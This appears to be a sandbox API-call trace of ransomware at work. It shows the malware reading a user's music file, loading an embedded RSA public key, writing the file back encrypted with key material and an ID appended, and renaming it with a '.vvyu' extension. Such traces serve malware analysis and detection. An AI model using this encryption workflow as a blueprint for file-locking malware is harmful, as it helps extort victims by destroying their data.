0x568 [0194.608] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=17008) returned 1 [0194.608] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.611] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x424a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.611] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.613] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.613] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x4270, lpOverlapped=0x0) returned 1 [0194.614] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.614] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.614] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.614] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.615] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.615] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.615] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.615] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.616] GetLastError () returned 0x0 [0194.616] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.616] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.616] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.616] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.616] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4270) returned 0x2ea79b0 [0194.617] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0fd8 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1020 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.618] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0194.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b70 [0194.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2b58 [0194.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0194.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0194.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.622] GetCurrentThreadId () returned 0x66c [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ffe0 [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.622] GetCurrentThreadId () returned 0x66c [0194.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b70 [0194.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bd0 [0194.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2be8 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b88 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b58 [0194.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0194.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0194.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1020 | out: hHeap=0x620000) returned 1 [0194.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.633] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x426b, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x426b, lpOverlapped=0x0) returned 1 [0194.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.634] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4270, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.634] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.636] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.637] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.637] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.637] CloseHandle (hObject=0x568) returned 1 [0194.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea3a68 [0194.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.639] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\J6JNV8GX8rXbh.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j6jnv8gx8rxbh.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\J6JNV8GX8rXbh.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j6jnv8gx8rxbh.wav.vvyu")) returned 1 [0194.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.641] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.644] 